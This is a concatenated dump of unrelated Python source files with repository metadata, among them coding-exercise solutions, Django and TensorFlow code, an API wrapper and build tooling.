class testArgs(unittest.TestCase):
def setUp(self):
self.args = (
['--foo', 'abc', 'abcdefg.ext'],
['-a', 'abc', '-a', 'bcd', '-a', 'cde', 'def.def'],
['-vvvv', 'abc.ea'],
#['--version'],
)
self.parser = argparse.ArgumentParser()
self.parser.add_argument('--foo', help='foo help', default='foo')
self.parser.add_argument('-a', '--all', help='all help', action='append')
self.parser.add_argument('-v', '--verbose', help='verbose help', action='count')
#self.parser.add_argument('--version', action='version', version='%(prog)s 0.3')
self.parser.add_argument('file', help='add filename')
def testargs(self):
for args in self.args:
print('args: ', args)
pargs = self.parser.parse_args(args)
print(pargs)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
6006a738df99a24e60f0d1202d8a0998e6f3c28b | 45f93a9d47204d76b8bf25a71dfb79403e75c33c | /CodeForces/yes-or-yes.py | cb4db3b37842abd3b41cac071b12adb1ab078941 | [] | no_license | tahmid-tanzim/problem-solving | 0173bce1973ac3e95441a76c10324c0e1b0a57c3 | 6ddb51de6772130f209474e76f39ca2938f444f0 | refs/heads/master | 2023-06-25T02:18:03.690263 | 2023-06-20T06:58:46 | 2023-06-20T06:58:46 | 137,173,850 | 4 | 1 | null | 2022-03-30T08:28:41 | 2018-06-13T06:44:25 | Python | UTF-8 | Python | false | false | 189 | py | # https://codeforces.com/problemset/problem/1703/A
# A. YES or YES?
if __name__ == "__main__":
for _ in range(int(input())):
print('YES' if input().lower() == 'yes' else 'NO')
| [
"[email protected]"
] | |
660bc9b69bbe66c2d9ce7f4e54e3b4a1dcabcda8 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/334/usersdata/294/100466/submittedfiles/listas.py | 90a4557636f7b45bccefc918ec87c0a87bd5ae66 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | # -*- coding: utf-8 -*-
n= int(input('Digite o número de elementos: '))
while n<2:
n= int(input('Digite o número de elementos: '))
a=[]
for i in range (0,n,1):
a.append(int(input('Digite o elemento%d: ' %(i+1))))
for i in range (0,n-1,1):
dif= a[i]-a[i+1]
if dif>0:
dif=dif*1
degrau=0
for i in range (0,n-1,1):
if dif>degrau:
degrau=dif
print(degrau)
| [
"[email protected]"
] | |
ec14651799152533ae1afb6b7c4b39d5335c4ecb | 2e74cff6c9639f3903ccde662e79359d0724285e | /2019_late/20190829/swea_5105_미로의거리.py | a33cf516df96ab271637b2d73566c84324d7b61b | [] | no_license | dodonmountain/algorithm | e29988071f651e51ba65e3926302f94a3d4074a5 | ce33e0d74220839aed4b17a47fa0069458a4324e | refs/heads/master | 2022-11-05T05:14:01.527015 | 2022-11-01T04:29:37 | 2022-11-01T04:29:37 | 200,008,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,349 | py | import sys
sys.stdin = open('5105.txt')
from pprint import pprint
from collections import deque
from collections import deque
def bfs(x, y):
global shortest
Q = deque()
visit[x][y] == True
Q.append((x, y))
dx = [0, 0, -1, 1]
dy = [-1, 1, 0, 0]
D = [[0] * N for _ in range(N)] # 최단 거리를 저장
while Q:
xx, yy = Q.popleft()
for step in range(4):
nx = xx + dx[step]
ny = yy + dy[step]
if nx < 0 or ny < 0 or nx > N-1 or ny > N-1:
continue
if maze[nx][ny] == 3:
shortest = D[xx][yy]
return
if maze[nx][ny] == 0 and visit[nx][ny] == False:
visit[nx][ny] = 1 # 방문표시
D[nx][ny] = D[xx][yy] + 1
Q.append((nx, ny))
T = int(input())
for t_case in range(T):
shortest = 0
N = int(input())
visit = [[0] * N for _ in range(N)]
maze = []
for _ in range(N):
maze.append(list(map(int,input())))
# pprint(maze, width=30)
for i in range(N):
for j in range(N):
if maze[i][j] == 2:
start = [i, j]
elif maze[i][j] == 3:
goal = [i, j]
bfs(start[0], start[1])
pprint(visit,width=40)
print('#{} {}'.format(t_case + 1, shortest))
| [
"[email protected]"
] | |
01d0c81a95e80f405f125fd99caa00848d8f6f63 | a86ca34e23afaf67fdf858df9e47847606b23e0c | /lib/temboo/Library/MailChimp/ListSubscribe.py | 1366bda24013c469dbaa94248b91bb53f0dbbfa1 | [] | no_license | miriammelnick/dont-get-mugged | 6026ad93c910baaecbc3f5477629b0322e116fa8 | 1613ee636c027ccc49c3f84a5f186e27de7f0f9d | refs/heads/master | 2021-01-13T02:18:39.599323 | 2012-08-12T23:25:47 | 2012-08-12T23:25:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,083 | py |
###############################################################################
#
# ListSubscribe
# Adds a subscriber to a MailChimp list.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
class ListSubscribe(Choreography):
"""
Create a new instance of the ListSubscribe Choreography. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
def __init__(self, temboo_session):
Choreography.__init__(self, temboo_session, '/Library/MailChimp/ListSubscribe')
def new_input_set(self):
return ListSubscribeInputSet()
def _make_result_set(self, result, path):
return ListSubscribeResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListSubscribeChoreographyExecution(session, exec_id, path)
"""
An InputSet with methods appropriate for specifying the inputs to the ListSubscribe
choreography. The InputSet object is used to specify input parameters when executing this choreo.
"""
class ListSubscribeInputSet(InputSet):
"""
Set the value of the APIKey input for this choreography. ((required, string) The API Key provided by Mailchimp.)
"""
def set_APIKey(self, value):
InputSet._set_input(self, 'APIKey', value)
"""
Set the value of the DoubleOptIn input for this choreography. ((optional, boolean) Flag to control whether a double opt-in confirmation message is sent. Specify '1' (true) or '0' (false). Defaults to 0.)
"""
def set_DoubleOptIn(self, value):
InputSet._set_input(self, 'DoubleOptIn', value)
"""
Set the value of the EmailAddress input for this choreography. ((conditional, string) The email address for the subscriber you want to create. Required unless the email address is included in the MergeVars input as part of your JSON object.)
"""
def set_EmailAddress(self, value):
InputSet._set_input(self, 'EmailAddress', value)
"""
Set the value of the EmailType input for this choreography. ((optional, string) Must be one of 'text', 'html', or 'mobile'. Defaults to html.)
"""
def set_EmailType(self, value):
InputSet._set_input(self, 'EmailType', value)
"""
Set the value of the ListId input for this choreography. ((required, string) The id of the list that the subsbriber will be added to.)
"""
def set_ListId(self, value):
InputSet._set_input(self, 'ListId', value)
"""
Set the value of the MergeVars input for this choreography. ((conditional, json) A JSON object of the merge fields for this subscriber. If the subscriber email address is not provided for the EmailAddress input, it must be specified here.)
"""
def set_MergeVars(self, value):
InputSet._set_input(self, 'MergeVars', value)
"""
Set the value of the ReplaceInterests input for this choreography. ((optional, boolean) A flag to determine whether to replace the interest groups with the groups provided or add the provided groups to the member's interest groups. Specify '1' (true) or '0' (false). Defaults to 1.)
"""
def set_ReplaceInterests(self, value):
InputSet._set_input(self, 'ReplaceInterests', value)
"""
Set the value of the SendWelcome input for this choreography. ((optional, boolean) If double_optin is false and this flag is true, a welcome email will be sent. Note that this does not apply when updating records. Specify '1' (true) or '0' (false). Defaults to 0.)
"""
def set_SendWelcome(self, value):
InputSet._set_input(self, 'SendWelcome', value)
"""
Set the value of the UpdateExisting input for this choreography. ((optional, boolean) Indicates that if the email already exists, this request will perform an update instead of an insert. Specify '1' (true) or '0' (false). Defaults to 1.)
"""
def set_UpdateExisting(self, value):
InputSet._set_input(self, 'UpdateExisting', value)
"""
A ResultSet with methods tailored to the values returned by the ListSubscribe choreography.
The ResultSet object is used to retrieve the results of a choreography execution.
"""
class ListSubscribeResultSet(ResultSet):
"""
Retrieve the value for the "Response" output from this choreography execution. (The response from Mailchimp. Returns the string "true" for success and an error description for failures.)
"""
def get_Response(self):
return self._output.get('Response', None)
class ListSubscribeChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListSubscribeResultSet(response, path)
| [
"miriam@famulus"
] | miriam@famulus |
445c6ff875319e02bf6c664717e3b20fcc1eeef2 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_peters.py | 5c5535b7cf2fe2459518556a2fea0f4e76f710a9 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py |
#calss header
class _PETERS():
def __init__(self,):
self.name = "PETERS"
self.definitions = peter
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['peter']
| [
"[email protected]"
] | |
05dfdbb7f1fe32835a1c9b65abe2e372a8d9fad3 | 3eff0ac549dd24fbade02d63c3a541ab88db1e5b | /ultimate_python/pythonrefresh.py | 36dd68b468c98ac1e89ac271b58821745d51e6d4 | [] | no_license | lisaolson/udemy | 618410fb548db864b7878de5a2231e8293daa2ad | f40f947f6f79d692748f3efba02176fb360f0c4e | refs/heads/master | 2020-03-28T20:14:23.028759 | 2018-09-18T19:45:32 | 2018-09-18T19:45:32 | 149,051,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,845 | py | # VARIABLE
age = 21
name="Lisa"
# print("Hello my name is {} and I am {} years old".format(name, age))
if age < 25:
print('You are young')
def hello(name, age):
return 'Hello {} you are {} years old'.format(name, age)
sentence = hello('Lisa', 21)
print(sentence)
# LIST
dognames = ["Fido", "Sean", "Sally", "Mark"]
dognames.insert(0, "Jane")
print(dognames)
print(dognames[2])
print(len(dognames))
dognames[1] = "Lilo"
print(dognames)
# FOR LOOP
for dog in dognames:
print(dog)
for x in range(1,10):
print(x)
age = 0
# WHILE LOOP
while age < 18:
print(age)
age += 1
numbers = [76, 83, 16, 69, 52, 78, 10, 77, 45, 52, 32, 17, 58, 54, 79, 72, 55, 50, 81, 74, 45, 33, 38, 10, 40, 44, 70, 81, 79, 28, 83, 41, 14, 16, 27, 38, 20, 84, 24, 50, 59, 71, 1, 13, 56, 91, 29, 54, 65, 23, 60, 57, 13, 39, 58, 94, 94, 42, 46, 58, 59, 29, 69, 60, 83, 9, 83, 5, 64, 70, 55, 89, 67, 89, 70, 8, 90, 17, 48, 17, 94, 18, 98, 72, 96, 26, 13, 7, 58, 67, 38, 48, 43, 98, 65, 8, 74, 44, 92]
for number in numbers:
if number > 90:
print(number)
# LIBRARY
dogs = {"Fido":8, "Sally":17, "Sean":2}
print(dogs["Sally"])
dogs["Sarah"] = 6
print(dogs)
# CLASS
class Dog:
dogInfo = "Hey dogs are cool!"
def bark(self, str): # self as the first parameter then you can add something for the second parameter
print('BARK!' + str)
mydog = Dog()
mydog.bark("bark bark bark bark")
mydog.name = "Fido"
mydog.age = 16
print(mydog.name)
print(mydog.age)
Dog.dogInfo = "Hey there"
print(Dog.dogInfo)
class Horse:
def __init__(self, name, age, furcolor): # you can call 'self' anything as long as it's the same everywhere
self.name = name
self.age = age
self.furcolor = furcolor
def neigh(self):
print("NEIGH!")
myhorse = Horse("Joker", 7, "Brown")
print(myhorse.age)
| [
"[email protected]"
] | |
f16f18958e39635b2ec69e9ef800bff4f89db0b2 | b05761d771bb5a85d39d370c649567c1ff3eb089 | /venv/lib/python3.10/site-packages/poetry/core/_vendor/tomlkit/api.py | 23658477769d0ea33af12aa07d3fc063cfaeaef7 | [] | no_license | JawshyJ/Coding_Practice | 88c49cab955eab04609ec1003b6b8c20f103fc06 | eb6b229d41aa49b1545af2120e6bee8e982adb41 | refs/heads/master | 2023-02-19T10:18:04.818542 | 2023-02-06T21:22:58 | 2023-02-06T21:22:58 | 247,788,631 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | /home/runner/.cache/pip/pool/3c/67/92/c18b0ffb5593ff972c09bb41120b8c23e3d192f2ff675748efe3028432 | [
"[email protected]"
] | |
a6bec2e6e27892e9e71ddf65399e880ac78e4293 | f00ad57c98e554470a72511dda7a7bfd160aca19 | /linear_structure/stack/infix_expression_ui.py | 5a43f72bf018cb2935ef1500165bb647398f3437 | [] | no_license | fanzhangg/algorithm-problems | d60115210aaaffcd094b34b9db5b46dadf93fe9e | 43b111ad625f197ba0905abceab9ee4484284e08 | refs/heads/master | 2021-07-12T20:24:46.265700 | 2020-07-06T17:58:31 | 2020-07-06T17:58:31 | 171,220,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | from infix_expression import *
def eval_infix_input():
while True:
infix = input(">>>")
if not infix:
print("Session ended. Thanks for using!")
break
try:
postfix = infix_to_postfix(infix)
answer = eval_postfix(postfix)
if int(answer) == answer:
answer = int(answer)
print(answer)
except SyntaxError:
print("Invalid syntax!")
if __name__ == "__main__":
eval_infix_input()
| [
"[email protected]"
] | |
7ed072fa1524c95c0ada3f899e91a7dcbcfd91de | 9897061cfd34babf80616ff21a20c30db0212970 | /server/account/models.py | a01557b1bd74e7b11b8ff7b13401a7a631636ebe | [
"MIT"
] | permissive | Samhaina/mahjong-portal | f310553c5df13e122f3e89d05a9867d0f122d4f1 | 4cdbd8bd61655584c25a437b3d5cab053507b2f4 | refs/heads/master | 2020-03-16T22:10:20.864718 | 2018-10-11T00:45:22 | 2018-10-11T00:45:22 | 133,029,373 | 0 | 0 | null | 2018-05-11T11:05:41 | 2018-05-11T11:05:41 | null | UTF-8 | Python | false | false | 287 | py | from django.db import models
from django.contrib.auth.models import AbstractUser
from tournament.models import Tournament
class User(AbstractUser):
is_tournament_manager = models.BooleanField(default=False)
managed_tournaments = models.ManyToManyField(Tournament, blank=True)
| [
"[email protected]"
] | |
6631cd057d686d0a0d7c910975132247c9c16828 | 4e30c855c253cc1d972d29e83edb9d5ef662d30a | /approval/models/returns.py | fc4920552b9ab0a32ad1d864ac946c3732809dab | [
"MIT"
] | permissive | rajeshr188/django-onex | 8b531fc2f519d004d1da64f87b10ffacbd0f2719 | 0a190ca9bcf96cf44f7773686205f2c1f83f3769 | refs/heads/master | 2023-08-21T22:36:43.898564 | 2023-08-15T12:08:24 | 2023-08-15T12:08:24 | 163,012,755 | 2 | 0 | NOASSERTION | 2023-07-22T09:47:28 | 2018-12-24T17:46:35 | Python | UTF-8 | Python | false | false | 3,919 | py | from django.contrib.contenttypes.fields import GenericRelation
from django.db import models, transaction
from django.db.models import Sum
from django.urls import reverse
from approval.models import ApprovalLine
from contact.models import Customer
from dea.models import Journal, JournalTypes
from product.models import StockLot
"""
When an approval voucher is created, the stock items that are being approved for release to a contact should be recorded in the database or inventory management system, along with the contact's information.
When the approved stock items are released to the contact, they should be recorded as being moved out of the approval area and into the possession of the contact.
If the contact returns some or all of the approved stock items, those items should be recorded as being returned to the approval area.
When the approval is complete and all approved stock items have been returned, the approval should be closed.
If any stock items were approved for release but not returned, those items should be flagged for invoicing.
When the invoice is created, the stock items that were approved but not returned should be included on the invoice, along with the appropriate billing information.
If any changes are made to the approval, return, or invoice, those changes should be recorded in the database or inventory management system, along with a timestamp and the user who made the changes.
"""
# Create your models here.
class Return(models.Model):
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True, editable=False)
created_by = models.ForeignKey(
"users.CustomUser", on_delete=models.CASCADE, null=True, blank=True
)
contact = models.ForeignKey(
Customer, related_name="approval_returns", on_delete=models.CASCADE
)
total_wt = models.DecimalField(max_digits=10, decimal_places=3, default=0)
total_qty = models.IntegerField(default=0)
posted = models.BooleanField(default=False)
def __str__(self):
return f"Return #{self.id}"
def get_absolute_url(self):
return reverse("approval:approval_return_detail", args=(self.pk,))
def get_total_qty(self):
return self.returnitem_set.aggregate(t=Sum("quantity"))["t"]
def get_total_wt(self):
return self.returnitem_set.aggregate(t=Sum("weight"))["t"]
class ReturnItem(models.Model):
return_obj = models.ForeignKey(Return, on_delete=models.CASCADE)
line_item = models.ForeignKey(
ApprovalLine, on_delete=models.CASCADE, related_name="return_items"
)
quantity = models.IntegerField(default=0)
weight = models.DecimalField(max_digits=10, decimal_places=3, default=0.0)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
journal = GenericRelation(Journal, related_query_name="approval_returnitem")
def __str__(self):
return f"{self.quantity} x {self.line_item.product}"
def get_absolute_url(self):
return reverse("approval:approval_returnitem_detail", args=(self.pk,))
def get_hx_edit_url(self):
kwargs = {"return_pk": self.return_obj.id, "pk": self.pk}
return reverse("approval:approval_returnitem_update", kwargs=kwargs)
def create_journal(self):
return Journal.objects.create(
journal_type=JournalTypes.SJ,
desc="Approval Return",
content_object=self,
)
def get_journal(self):
return self.journal.first()
@transaction.atomic
def post(self, journal):
self.line_item.product.transact(self.weight, self.quantity, journal, "AR")
self.line_item.update_status()
@transaction.atomic
def unpost(self, journal):
self.line_item.product.transact(self.weight, self.quantity, journal, "A")
self.line_item.update_status()
| [
"[email protected]"
] | |
b4e8b03b8387462c961ea36f580a145007ada11a | 38b68b2202726bcdea32271448fea22554db6121 | /BOJ/Silver/1992.py | 3b0a539d575b9951914cdb95f3dbd52b1b69e1cd | [] | no_license | Soohee410/Algorithm-in-Python | 42c4f02342dc922e44ee07e3a0e1d6c0a559e0bb | fbc859c092d86174387fe3dc11f16b616e6fdfab | refs/heads/master | 2023-05-06T13:07:19.179143 | 2021-05-14T14:32:44 | 2021-05-14T14:32:44 | 336,232,129 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | def QuadTree(n, cp, x, y):
if n == 1:
return cp[x][y]
cp1 = QuadTree(n // 2, cp, x, y)
cp2 = QuadTree(n // 2, cp, x, y + n // 2)
cp3 = QuadTree(n // 2, cp, x + n // 2, y)
cp4 = QuadTree(n // 2, cp, x + n // 2, y + n // 2)
if cp1 == cp2 == cp3 == cp4 and len(cp1) == 1:
return cp1
return '('+cp1+cp2+cp3+cp4+')'
if __name__ == "__main__":
n = int(input())
arr = [list(input().rstrip()) for _ in range(n)]
print(QuadTree(n, arr, 0, 0))
| [
"[email protected]"
] | |
1b59986d14faeb17881c11ce0e4490deee33f0a4 | 08330ea5c2495d5dc958d4cf11b68c5650396e3e | /main.py | 96bc672b9314ca63c2ef52b701f996ef5869ae68 | [] | no_license | marco-willi/tf-estimator-cnn | d74be01143b6a724534737807ebb78db518c6b87 | df3a5651b0f8018d3b9bc4b424f8090fb74ca26f | refs/heads/master | 2020-03-22T03:00:54.073040 | 2018-07-17T08:52:16 | 2018-07-17T08:52:16 | 139,408,220 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,526 | py | """ Estimator API for CNNs using popular implementations """
import os
import random
import tensorflow as tf
import numpy as np
from estimator import model_fn
#################################
# Parameters
#################################
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_string(
'root_path',
'',
"Images root path - must contain directories with class specific images")
flags.DEFINE_string(
'model_save_path', '',
"Path in which to save graphs, models and summaries")
flags.DEFINE_string(
'model', 'small_cnn',
"Model name")
flags.DEFINE_integer(
'max_epoch', 10,
"Max epoch to train model")
flags.DEFINE_integer(
'batch_size', 64,
"Batch size for model training")
flags.DEFINE_integer(
'image_size', 50,
"Image size (width/height) for model input")
flags.DEFINE_integer(
'num_gpus', 0,
"Number of GPUs for model training")
flags.DEFINE_integer(
'num_cpus', 2,
"Numer of CPUs (for pre-processing)")
flags.DEFINE_float('train_fraction', 0.8, "training set fraction")
flags.DEFINE_bool(
'color_augmentation', True,
"Whether to randomly adjust colors during model training")
flags.DEFINE_float(
'weight_decay', 0,
'Applies weight decay if supported by specific model')
flags.DEFINE_list(
'image_means', [0, 0, 0],
'image means (leave at default for automatic mode)')
flags.DEFINE_list(
'image_stdevs', [1, 1, 1],
'image stdevs (leave at default for automatic mode)')
# #DEBUG
# FLAGS.root_path = '/host/data_hdd/ctc/ss/images/'
# FLAGS.model_save_path = '/host/data_hdd/ctc/ss/runs/species/resnet18_test/'
# FLAGS.model = 'ResNet18'
# FLAGS.num_gpus = 1
# FLAGS.num_cpus = 4
# FLAGS.weight_decay = 0.0001
#################################
# Define Dataset
#################################
# get all class directories
classes = os.listdir(FLAGS.root_path)
n_classes = len(classes)
# find all images
image_paths = dict()
for cl in classes:
image_names = os.listdir(os.path.join(FLAGS.root_path, cl))
image_paths[cl] = [os.path.join(FLAGS.root_path, cl, x)
for x in image_names]
# Map classes to numerics
classes_to_num_map = {k: i for i, k in enumerate(classes)}
num_to_class_map = {v: k for k, v in classes_to_num_map.items()}
# Create lists of image paths and labels
label_list = list()
image_path_list = list()
for k, v in image_paths.items():
label_list += [classes_to_num_map[k] for i in range(0, len(v))]
image_path_list += v
# randomly shuffle input to ensure good mixing when model training
indices = [i for i in range(0, len(label_list))]
random.seed(123)
random.shuffle(indices)
image_path_list = [image_path_list[i] for i in indices]
label_list = [label_list[i] for i in indices]
n_records = len(label_list)
# Create training and test set
train_fraction = FLAGS.train_fraction
n_train = int(round(n_records * train_fraction, 0))
n_test = n_records - n_train
train_files = image_path_list[0: n_train]
train_labels = label_list[0: n_train]
test_files = image_path_list[n_train:]
test_labels = label_list[n_train:]
#################################
# Dataset Iterator
#################################
# Standardize a single image
def _standardize_images(image, means, stdevs):
""" Standardize images """
with tf.name_scope("image_standardization"):
means = tf.expand_dims(tf.expand_dims(means, 0), 0)
means = tf.cast(means, tf.float32)
stdevs = tf.expand_dims(tf.expand_dims(stdevs, 0), 0)
stdevs = tf.cast(stdevs, tf.float32)
image = image - means
image = tf.divide(image, stdevs)
return image
# data augmentation
def _image_augmentation(image):
""" Apply some random image augmentation """
with tf.name_scope("image_augmentation"):
image = tf.image.random_flip_left_right(image)
image = tf.image.random_brightness(image, max_delta=0.2)
image = tf.image.random_contrast(image, lower=0.9, upper=1)
image = tf.image.random_hue(image, max_delta=0.02)
image = tf.image.random_saturation(image, lower=0.8, upper=1.2)
return image
# parse a single image
def _parse_function(filename, label, augmentation=True):
image_string = tf.read_file(filename)
image = tf.image.decode_jpeg(image_string, channels=3)
# randomly crop image from plus 10% width/height
if augmentation:
image = tf.image.resize_images(
image, [int(FLAGS.image_size*1.1), int(FLAGS.image_size*1.1)])
image = tf.random_crop(image, [FLAGS.image_size, FLAGS.image_size, 3])
else:
image = tf.image.resize_images(
image, [FLAGS.image_size, FLAGS.image_size])
image = tf.divide(image, 255.0)
if augmentation:
image = _image_augmentation(image)
image = _standardize_images(image, FLAGS.image_means,
FLAGS.image_stdevs)
return {'images': image, 'labels': label}
def dataset_iterator(filenames, labels, is_train, augmentation=True):
dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))
if is_train:
dataset = dataset.shuffle(buffer_size=300)
dataset = dataset.apply(
tf.contrib.data.map_and_batch(
lambda x, y: _parse_function(x, y, augmentation),
batch_size=FLAGS.batch_size,
num_parallel_batches=1,
drop_remainder=False))
if is_train:
dataset = dataset.repeat(1)
else:
dataset = dataset.repeat(1)
dataset = dataset.prefetch(buffer_size=tf.contrib.data.AUTOTUNE)
return dataset
# Create callable iterator functions
def train_iterator():
return dataset_iterator(train_files, train_labels, True,
FLAGS.color_augmentation)
def test_iterator():
return dataset_iterator(test_files, test_labels, False, False)
def original_iterator():
return dataset_iterator(train_files, train_labels, False, False)
#################################
# Image Statistics for Preprocessing
#################################
# Calculate image means and stdevs of training images for RGB channels
# for image standardization
if (FLAGS.image_means == [0, 0, 0]) and (FLAGS.image_stdevs == [1, 1, 1]):
with tf.Session() as sess:
original_batch_size = FLAGS.batch_size
FLAGS.batch_size = np.min([500, n_train])
dataset = original_iterator()
iterator = dataset.make_one_shot_iterator()
feature_dict = iterator.get_next()
features = sess.run(feature_dict)
image_batch = features['images']
means_batch = np.mean(image_batch, axis=(0, 1, 2))
stdev_batch = np.std(image_batch, axis=(0, 1, 2))
FLAGS.batch_size = original_batch_size
image_means = [round(float(x), 6) for x in list(means_batch)]
image_stdevs = [round(float(x), 4) for x in list(stdev_batch)]
FLAGS.image_means = image_means
FLAGS.image_stdevs = image_stdevs
#################################
# Configure Estimator
#################################
n_batches_per_epoch_train = int(round(n_train / FLAGS.batch_size))
# Configurations
config_sess = tf.ConfigProto(allow_soft_placement=True)
config_sess.gpu_options.per_process_gpu_memory_fraction = 0.8
config_sess.gpu_options.allow_growth = True
def distribution_gpus(num_gpus):
if num_gpus == 0:
return tf.contrib.distribute.OneDeviceStrategy(device='/cpu:0')
elif num_gpus == 1:
return tf.contrib.distribute.OneDeviceStrategy(device='/gpu:0')
elif num_gpus > 1:
return tf.contrib.distribute.MirroredStrategy(num_gpus=num_gpus)
else:
return None
# Config estimator
est_config = tf.estimator.RunConfig()
est_config = est_config.replace(
keep_checkpoint_max=3,
save_checkpoints_steps=n_batches_per_epoch_train,
session_config=config_sess,
save_checkpoints_secs=None,
save_summary_steps=n_batches_per_epoch_train,
model_dir=FLAGS.model_save_path,
train_distribute=distribution_gpus(FLAGS.num_gpus))
# Model Parameters
params = dict()
params['label'] = ['labels']
params['n_classes'] = [n_classes]
params['weight_decay'] = FLAGS.weight_decay
params['momentum'] = 0.9
params['model'] = FLAGS.model
params['reuse'] = False
params['class_mapping_clean'] = {'labels': num_to_class_map}
# create estimator
estimator = tf.estimator.Estimator(model_fn=model_fn,
params=params,
model_dir=FLAGS.model_save_path,
config=est_config
)
#################################
# Train and Evaluate
#################################
def main(args):
""" Main - called by command line """
# Print flags
for f in flags.FLAGS:
print("Flag %s - %s" % (f, FLAGS[f].value))
eval_loss = list()
for epoch in range(1, FLAGS.max_epoch + 1):
print("Starting with epoch %s" % epoch)
# Train for one epoch
estimator.train(input_fn=train_iterator)
# Evaluate
eval_res = estimator.evaluate(input_fn=test_iterator)
print("Evaluation results:")
for k, v in eval_res.items():
print(" Res for %s - %s" % (k, v))
eval_loss.append(eval_res['loss'])
# Predict
preds = estimator.predict(input_fn=test_iterator)
for i, pred in enumerate(preds):
print(pred)
if i > 10:
break
if __name__ == '__main__':
tf.app.run()
| [
"[email protected]"
] | |
0f3cc4a2087d8125cc761a1644c51c12e6c814d4 | d838bed08a00114c92b73982a74d96c15166a49e | /docs/data/learn/Bioinformatics/output/ch6_code/src/Stepik.6.9.CodeChallenge.2BreakDistance.py | a9ce5254b6d1201e2c2202e7b13a59eeda40ae42 | [] | no_license | offbynull/offbynull.github.io | 4911f53d77f6c59e7a453ee271b1e04e613862bc | 754a85f43159738b89dd2bde1ad6ba0d75f34b98 | refs/heads/master | 2023-07-04T00:39:50.013571 | 2023-06-17T20:27:05 | 2023-06-17T23:27:00 | 308,482,936 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | from BreakpointGraph import BreakpointGraph
with open('/home/user/Downloads/dataset_240324_4.txt', mode='r', encoding='utf-8') as f:
data = f.read()
lines = data.split('\n')
p_list1 = [[int(x) for x in s.split(' ')] for s in lines[0][1:-1].split(')(')]
p_list2 = [[int(x) for x in s.split(' ')] for s in lines[1][1:-1].split(')(')]
bg = BreakpointGraph(p_list1, p_list2)
cycles = bg.get_red_blue_cycles()
block_count = len(bg.node_to_blue_edges) // 2 # number of synteny blocks is number of nodes / 2
cycle_count = len(cycles)
print(f'{block_count - cycle_count}') | [
"[email protected]"
] | |
35c792e078f9037cf38a3a3bd992d3b7bee00e0d | de17634e6b149d5828c1c78f7f5f5e1f6c17c4d0 | /nnvm/amalgamation/amalgamation.py | 310daa9d68e0e2cd33876364a3e4533f23cc45b5 | [
"Apache-2.0",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | starimpact/mxnet_v1.0.0 | e135cc9e4c2711314d03cf1281a72b755f53144e | fcd6f7398ef811c3f8b01e7c9c16fb25c8d202bd | refs/heads/bv1.0.0 | 2022-11-10T09:09:11.966942 | 2018-07-13T04:59:30 | 2018-07-13T04:59:30 | 120,399,107 | 8 | 4 | Apache-2.0 | 2022-11-02T20:24:32 | 2018-02-06T03:54:35 | C++ | UTF-8 | Python | false | false | 2,628 | py | import sys
import os.path, re, StringIO
blacklist = [
'Windows.h',
'mach/clock.h', 'mach/mach.h',
'malloc.h',
'glog/logging.h', 'io/azure_filesys.h', 'io/hdfs_filesys.h', 'io/s3_filesys.h',
'sys/stat.h', 'sys/types.h',
'omp.h', 'execinfo.h', 'packet/sse-inl.h'
]
def get_sources(def_file):
sources = []
files = []
visited = set()
mxnet_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
for line in open(def_file):
files = files + line.strip().split(' ')
for f in files:
f = f.strip()
if not f or f.endswith('.o:') or f == '\\': continue
fn = os.path.relpath(f)
if os.path.abspath(f).startswith(mxnet_path) and fn not in visited:
sources.append(fn)
visited.add(fn)
return sources
sources = get_sources(sys.argv[1])
def find_source(name, start):
candidates = []
for x in sources:
if x == name or x.endswith('/' + name): candidates.append(x)
if not candidates: return ''
if len(candidates) == 1: return candidates[0]
for x in candidates:
if x.split('/')[1] == start.split('/')[1]: return x
return ''
re1 = re.compile('<([./a-zA-Z0-9_-]*)>')
re2 = re.compile('"([./a-zA-Z0-9_-]*)"')
sysheaders = []
history = set([])
out = StringIO.StringIO()
def expand(x, pending):
if x in history and x not in ['mshadow/mshadow/expr_scalar-inl.h']: # MULTIPLE includes
return
if x in pending:
#print 'loop found: %s in ' % x, pending
return
print >>out, "//===== EXPANDING: %s =====\n" %x
for line in open(x):
if line.find('#include') < 0:
out.write(line)
continue
if line.strip().find('#include') > 0:
print line
continue
m = re1.search(line)
if not m: m = re2.search(line)
if not m:
print line + ' not found'
continue
h = m.groups()[0].strip('./')
source = find_source(h, x)
if not source:
if (h not in blacklist and
